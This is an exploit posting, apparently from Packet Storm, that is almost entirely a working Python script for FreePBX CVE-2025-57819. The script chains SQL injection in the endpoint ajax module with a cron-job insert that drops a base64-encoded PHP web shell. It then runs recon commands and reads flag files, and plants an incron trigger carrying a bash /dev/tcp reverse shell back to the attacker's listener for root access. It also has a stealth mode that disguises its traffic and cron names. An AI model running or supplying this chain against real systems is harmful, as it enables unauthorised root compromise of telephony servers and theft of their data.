Share
## https://sploitus.com/exploit?id=PACKETSTORM:223388
==================================================================================================================================
    | # Title     : FreePBX 17.0.3 SQLi to Root Shell                                                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://www.freepbx.org/                                                                                         |
    ==================================================================================================================================
    
    [+] Summary    :   This Python3 script exploits a critical SQL injection vulnerability (CVE-2025-57819) in FreePBX. 
                       This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import urllib3
    import sys
    import time
    import base64
    import json
    import zlib
    import threading
    import socket
    import re
    from urllib.parse import quote, urlparse
    from colorama import init, Fore, Style
    import argparse
    import random
    import string
    
    init(autoreset=True)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class FreePBXExploit:
        def __init__(self, target, lhost=None, lport=None, verbose=False, stealth=False):
            self.target = target.rstrip('/')
            self.lhost = lhost
            self.lport = lport
            self.verbose = verbose
            self.stealth = stealth
            self.session = requests.Session()
            self.webshell_path = None
            self.session.headers.update({
                'User-Agent': self.get_random_ua() if stealth else 'Mozilla/5.0 (X11; Linux x86_64)'
            })
        def get_random_ua(self):
            uas = [
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
                'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36'
            ]
            return random.choice(uas)
        def log_info(self, msg): print(f"{Fore.CYAN}[*]{Style.RESET_ALL} {msg}")
        def log_success(self, msg): print(f"{Fore.GREEN}[+]{Style.RESET_ALL} {msg}")
        def log_warning(self, msg): print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} {msg}")
        def log_error(self, msg): print(f"{Fore.RED}[-]{Style.RESET_ALL} {msg}")
        def log_debug(self, msg):
            if self.verbose:
                print(f"{Fore.MAGENTA}[D]{Style.RESET_ALL} {msg}")
        def build_sqli_url(self, payload):
            """Build URL with SQL injection payload"""
            ajax_path = f"{self.target}/admin/ajax.php"
            module = "FreePBX\\modules\\endpoint\\ajax"
            params = {
                'module': module,
                'command': 'model',
                'template': 'x',
                'model': 'model',
                'brand': payload
            }
            param_str = '&'.join([f"{k}={quote(str(v))}" for k, v in params.items()])
            return f"{ajax_path}?{param_str}"
        def sqli_read(self, subquery, retries=3):
            """Extract data via error-based SQL injection"""
            payload = f"x' AND EXTRACTVALUE(1,CONCAT(0x7e,({subquery}),0x7e))-- -"
            for attempt in range(retries):
                try:
                    url = self.build_sqli_url(payload)
                    response = self.session.get(url, verify=False, timeout=10)
                    if response.status_code == 200:
                        try:
                            data = response.json()
                            error_msg = data.get('error', {}).get('message', '')
                            match = re.search(r'~([^~]+)~', error_msg)
                            if match:
                                return match.group(1)
                        except:
                            pass
                except Exception as e:
                    self.log_debug(f"SQLi read attempt {attempt + 1} failed: {e}")
                time.sleep(1)
            return None
        def sqli_write(self, statement):
            """Execute SQL write operation"""
            payload = f"x'; {statement}-- -"
            try:
                url = self.build_sqli_url(payload)
                response = self.session.get(url, verify=False, timeout=10)
                if response.status_code == 200:
                    if 'Whoops' in response.text or 'array offset' in response.text:
                        return True
            except Exception as e:
                self.log_debug(f"SQLi write error: {e}")
                return True 
            return False
        def webshell_exec(self, cmd):
            """Execute command via webshell"""
            if not self.webshell_path:
                return None
            try:
                url = f"https://{self.target}{self.webshell_path}"
                response = self.session.get(url, params={'cmd': cmd}, verify=False, timeout=15)
                if response.status_code == 200:
                    return response.text.strip()
            except:
                pass
            return None
        def enumerate_database(self):
            """Enumerate database information"""
            self.log_info("Enumerating database...")
            db_info = {}
            queries = {
                'database': 'SELECT DATABASE()',
                'user': 'SELECT USER()',
                'version': 'SELECT VERSION()',
                'hostname': 'SELECT @@hostname'
            }
            for key, query in queries.items():
                result = self.sqli_read(query)
                if result:
                    db_info[key] = result
                    self.log_success(f"{key.capitalize()}: {result}")
                else:
                    self.log_warning(f"Could not retrieve {key}")
            return db_info
        def drop_webshell(self):
            """Drop PHP webshell via cron job"""
            self.log_info("Dropping webshell via cron job...")
            random_name = ''.join(random.choices(string.ascii_lowercase, k=8))
            self.webshell_path = f"/{random_name}.php"
            webshell_code = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+Cg=="
            full_path = f"/var/www/html{self.webshell_path}"
            cmd = f"echo {webshell_code} | base64 -d > {full_path}"
            cron_name = f"sys_{random_name}" if self.stealth else "poc_webshell"
            sql = f"""
                INSERT INTO cron_jobs 
                (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order) 
                VALUES ('sysadmin', '{cron_name}', '{cmd}', NULL, '* * * * *', 30, 1, 1)
            """
            if self.sqli_write(sql):
                self.log_success(f"Cron job inserted (executes every minute)")
                return True
            else:
                self.log_error("Failed to insert cron job")
                return False
        def wait_for_webshell(self, timeout=120):
            """Wait for webshell to become active"""
            self.log_info(f"Waiting for webshell activation (max {timeout}s)...")
            start_time = time.time()
            while time.time() - start_time < timeout:
                result = self.webshell_exec("id")
                if result and ('uid=' in result or 'gid=' in result):
                    self.log_success(f"Webshell active! Response: {result[:100]}")
                    return True
                elapsed = int(time.time() - start_time)
                remaining = timeout - elapsed
                self.log_info(f"Webshell not ready... ({remaining}s remaining)")
                time.sleep(10)
            self.log_error("Timeout waiting for webshell")
            return False
        def execute_system_commands(self, commands):
            """Execute multiple system commands and collect output"""
            results = {}
            for cmd in commands:
                self.log_info(f"Executing: {cmd}")
                output = self.webshell_exec(cmd)
                if output:
                    results[cmd] = output
                    print(f"    {output[:200]}")
                else:
                    print("    (no output)")
            return results
        def get_flags(self):
            """Attempt to read CTF flags"""
            self.log_info("Searching for flags...")
            flag_patterns = [
                '/home/*/user.txt',
                '/home/*/flag.txt',
                '/root/root.txt',
                '/root/flag.txt',
                '/var/www/html/flag.txt'
            ]
            flags_found = []
            for pattern in flag_patterns:
                cmd = f"find {pattern} -type f 2>/dev/null | head -1"
                path = self.webshell_exec(cmd)
                if path and path.strip():
                    flag = self.webshell_exec(f"cat {path.strip()}")
                    if flag and len(flag) < 200:
                        self.log_success(f"Flag found at {path}: {flag}")
                        flags_found.append((path, flag))
            return flags_found
        def incron_root_shell(self):
            """Use incron hook for root reverse shell"""
            if not self.lhost or not self.lport:
                self.log_warning("No listener configured, skipping root shell")
                return False
            self.log_info("Preparing incron-based root shell...")
            rev_shell = f"bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1"
            payload_data = [rev_shell, "txn"]
            json_str = json.dumps(payload_data)
            compressed = zlib.compress(json_str.encode())
            encoded = base64.b64encode(compressed).decode().replace('/', '_')
            trigger_file = f"/var/spool/asterisk/incron/api.fwconsole-commands.{encoded}"
            self.log_info(f"Trigger file: {trigger_file}")
            self.log_warning(f"Start listener: nc -lvnp {self.lport}")
            input(f"{Fore.YELLOW}[?]{Style.RESET_ALL} Press Enter when listener is ready...")
            result = self.webshell_exec(f"touch '{trigger_file}'")
            if result is None or result == "":
                self.log_success("Trigger file created - incron should fire as root!")
                self.log_info("Check your listener for root shell...")
                time.sleep(5)
                return True
            else:
                self.log_error(f"Failed to create trigger file: {result}")
                return False
        def cleanup(self):
            """Remove webshell and cron job"""
            self.log_info("Cleaning up...")
            if self.webshell_path:
                full_path = f"/var/www/html{self.webshell_path}"
                self.webshell_exec(f"rm -f {full_path}")
                self.log_success("Webshell removed")
            sql = "DELETE FROM cron_jobs WHERE jobname LIKE 'poc_%' OR jobname LIKE 'sys_%'"
            self.sqli_write(sql)
            self.log_success("Cron jobs cleaned")
        def run_exploit(self):
            """Main exploit chain"""
            print(f"""
    {Fore.MAGENTA}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘         FreePBX CVE-2025-57819 - Advanced Exploit                โ•‘
    โ•‘         Full Chain: SQLi โ†’ Webshell โ†’ Root Shell                 โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•{Style.RESET_ALL}
    """)
            self.log_info(f"Target: https://{self.target}")
            if self.lhost:
                self.log_info(f"Listener: {self.lhost}:{self.lport}")
            self.log_info("Step 1: Verifying SQL injection...")
            test_result = self.sqli_read("SELECT 123")
            if test_result != "123":
                self.log_error("SQL injection not working!")
                return False
            self.log_success("SQL injection confirmed!")
            self.enumerate_database()
            self.log_info("Step 2: Dropping webshell...")
            if not self.drop_webshell():
                return False
            if not self.wait_for_webshell():
                return False
            self.log_info("Step 3: System reconnaissance...")
            recon_cmds = [
                "id",
                "hostname",
                "uname -a",
                "whoami",
                "pwd"
            ]
            self.execute_system_commands(recon_cmds)
            self.get_flags()
            if self.lhost and self.lport:
                self.log_info("Step 4: Attempting root shell...")
                self.incron_root_shell()
            cleanup = input(f"\n{Fore.YELLOW}[?]{Style.RESET_ALL} Cleanup artifacts? [y/N] ")
            if cleanup.lower() == 'y':
                self.cleanup()
            self.log_success("Exploit completed!")
            return True
    def main():
        parser = argparse.ArgumentParser(description='FreePBX CVE-2025-57819 Exploit')
        parser.add_argument('-t', '--target', required=True, help='Target FreePBX URL (e.g., connected.htb)')
        parser.add_argument('-l', '--lhost', help='Listener IP for reverse shell')
        parser.add_argument('-p', '--lport', type=int, help='Listener port')
        parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
        parser.add_argument('-s', '--stealth', action='store_true', help='Enable stealth mode')
        parser.add_argument('--check', action='store_true', help='Only check vulnerability')
        args = parser.parse_args()
        exploit = FreePBXExploit(
            target=args.target,
            lhost=args.lhost,
            lport=args.lport,
            verbose=args.verbose,
            stealth=args.stealth
        )
        if args.check:
            print("Checking vulnerability...")
            result = exploit.sqli_read("SELECT 123")
            if result == "123":
                print(f"{Fore.GREEN}[+] Target is VULNERABLE{Style.RESET_ALL}")
            else:
                print(f"{Fore.RED}[-] Target is NOT vulnerable{Style.RESET_ALL}")
            return
        exploit.run_exploit()
    if __name__ == "__main__":
        main()
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================